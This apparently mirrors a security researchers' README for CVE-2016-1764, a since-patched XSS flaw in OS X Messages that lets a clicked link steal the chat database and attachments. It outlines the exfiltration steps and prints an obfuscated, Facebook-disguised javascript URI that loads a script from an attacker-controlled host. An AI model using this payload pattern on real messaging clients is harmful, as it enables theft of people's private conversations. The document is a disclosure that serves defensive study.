Data

Tools

Indexes

Applications

Experiments

Awesome

An open API service indexing awesome lists of open source software.

https://github.com/moloch--/cve-2016-1764

Extraction of iMessage Data via XSS
https://github.com/moloch--/cve-2016-1764

cve exploit imessage security vulnerability xss

Last synced: 11 months ago
JSON representation

Extraction of iMessage Data via XSS

Awesome Lists containing this project

README 

          
# PoC Exploit Code for CVE-2016-1764

### Recovery of Plaintext iMessage Data Without Breaking Crypto



![](images/messages.png)



### Authors



* [Shubham Shah](https://shubh.am/) from [Bishop Fox](http://bishopfox.com/)

* [Joe DeMesy](https://github.com/moloch--) from [Bishop Fox](http://bishopfox.com/)

* [Matthew Bryant](https://thehackerblog.com/)



## CVE-2016-1764



**Vendor:** Apple



**Release Date:** April 8, 2016



**Patch Date:** March 21, 2016



**Systems Affected:** Messages on OSX Mountain Yosemite, El Capitan



While the majority of recent debate around Apple has been focused on cryptography, the industry and law enforcement seems to have forgotten that simpler, application-level vulnerabilities can be leveraged to forgo encryption altogether. CVE-2016-1764, which was fixed by Apple in March of 2016, is an application-layer bug that results in the remote disclosure of all message content and attachments in plaintext by exploiting the OS X iMessage client. Moreover, you do not need a graduate degree in mathematics to exploit it, nor does it require detailed knowledge of memory managment, shellcode, or intricate ASLR bypass ROP chains. In fact, it is a relatively simple bug that can be exploited by anyone with a basic knowledge of JavaScript.



## Technical TL;DR



Messages (iMessage) for OS X from Apple, implements its user interface using an embedded version of WebKit, furthermore Messages on OS X will render any URI as a clickable HTML `/Library/Messages/*`



The textual content of these messages and other metadata are stored within a SQLite database located at:



`/Users//Library/Messages/chat.db`



This database also contains the locations for all of the attachments that are located on a user's machine.



In order to steal this database, and subsequently all of the attachments ever received or sent by a victim, a more advanced attack payload is needed.



### Exploit Overview



The following steps need to be carried out before the data can be successfully exfiltrated by an attacker:



1. Gain initial JavaScript execution in the application DOM

2. Obtain the current user (again `~` cannot be used)

4. Using the username, generate a full path that for the `chat.db` file i.e. `/Users/ExampleUser/Library/Messages/chat.db`

5. Use `XMLHttpRequest` to read the `chat.db` database and query it for attachment's file paths

6. Upload the database and all attachments using `XMLHttpRequest` or WebSockets if you want realtime access.



We can determine the currently logged in user by requesting, and subsequently parsing `/Library/Preferences/com.apple.loginwindow.plist`, this file is conviently readable from within the OS X application sandbox. From here it is trivial to construct the full path to the user's `chat.db`.



Once the database file has been successfully exfiltrated, it can be passed to a custom server-side script which extracts the full paths of the attachments sent and received by the victim, found within the `attachments` table in the database.



These full paths are retrieved by the malicious JavaScript payload and then are used to exfiltrate the attachment files from the victim's machine via `XMLHttpRequest`.



Next the attacker does a little obfuscation to make the URL a little more believable:



```

javascript://www.facebook.com/photo.php?fbid=111789595853599&set=a.111055039260388.1073741826.100010676767694&type=3&theater%0A%28function%28s%29%7Bs.src%3D%27http%3A%2f%2fyourhostname%3A8888%2ff%2fpayload.js%27%3Bdocument.body.appendChild%28s%29%7D%29%28document.createElement%28%27script%27%29%29

```



If the victim were to click the above URI in the Messages for OS X application, the victim's entire chat history and all associated attachments will be sent to the attacker.



## Take Aways



_JavaScript is Everywhere_



Web application security flaws are no longer limited to only the browser but rather have found their way into native applications too. While it can be productive for developers to use web technologies such as [WebKit](https://webkit.org/), or its far more dangerous kin [nw.js](http://nwjs.io/), to build desktop applications web application security best practices must still be followed.